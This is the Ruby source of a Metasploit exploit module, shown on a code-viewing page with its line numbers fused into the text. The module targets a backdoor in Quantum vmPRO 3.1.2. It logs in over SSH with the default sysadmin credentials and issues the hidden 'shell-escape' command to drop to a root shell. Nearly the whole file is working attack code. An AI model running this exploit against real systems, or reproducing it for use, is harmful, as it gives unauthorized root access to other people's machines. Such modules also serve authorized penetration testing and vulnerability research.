Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'net/ssh'6require 'net/ssh/command_stream'78class MetasploitModule < Msf::Exploit::Remote9Rank = ExcellentRanking1011include Msf::Exploit::Remote::SSH1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Quantum vmPRO Backdoor Command',18'Description' => %q{19This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin20privileges, can get access to the restricted SSH shell. By using the hidden backdoor21"shell-escape" command it's possible to drop to a real root bash shell. This module22has been tested successfully on Quantum vmPRO 3.1.2.23},24'License' => MSF_LICENSE,25'Author' => [26'xistence <xistence[at]0x90.nl>' # Original discovery and Metasploit module27],28'References' => [29['PACKETSTORM', '125760']30],31'DefaultOptions' => {32'EXITFUNC' => 'thread'33},34'Payload' => {35'Compat' => {36'PayloadType' => 'cmd_interact',37'ConnectionType' => 'find'38}39},40'Platform' => 'unix',41'Arch' => ARCH_CMD,42'Targets' => [43['Quantum vmPRO 3.1.2', {}],44],45'Privileged' => true,46'DisclosureDate' => '2014-03-17',47'DefaultTarget' => 0,48'Notes' => {49'Stability' => [CRASH_SAFE],50'Reliability' => [REPEATABLE_SESSION],51'SideEffects' => []52}53)54)5556register_options(57[58Opt::RHOST(),59Opt::RPORT(22),60OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']),61OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin'])62], self.class63)6465register_advanced_options(66[67OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),68OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])69]70)71end7273def rhost74datastore['RHOST']75end7677def rport78datastore['RPORT']79end8081def do_login(user, pass)82opts = ssh_client_defaults.merge({83auth_methods: ['password', 'keyboard-interactive'],84port: rport,85password: pass86})8788opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']8990begin91ssh = nil92::Timeout.timeout(datastore['SSH_TIMEOUT']) do93ssh = Net::SSH.start(rhost, user, opts)94end95rescue Rex::ConnectionError96return nil97rescue Net::SSH::Disconnect, ::EOFError98print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"99return nil100rescue ::Timeout::Error101print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"102return nil103rescue Net::SSH::AuthenticationFailed104print_error "#{rhost}:#{rport} SSH - Failed authentication"105return nil106rescue Net::SSH::Exception => e107print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"108return nil109end110111if ssh112conn = Net::SSH::CommandStream.new(ssh, 'shell-escape')113return conn114end115116return nil117end118119def exploit120user = datastore['USER']121pass = datastore['PASS']122123print_status("#{rhost}:#{rport} - Attempt to login...")124conn = do_login(user, pass)125if conn126print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})")127handler(conn.lsock)128end129end130end131132133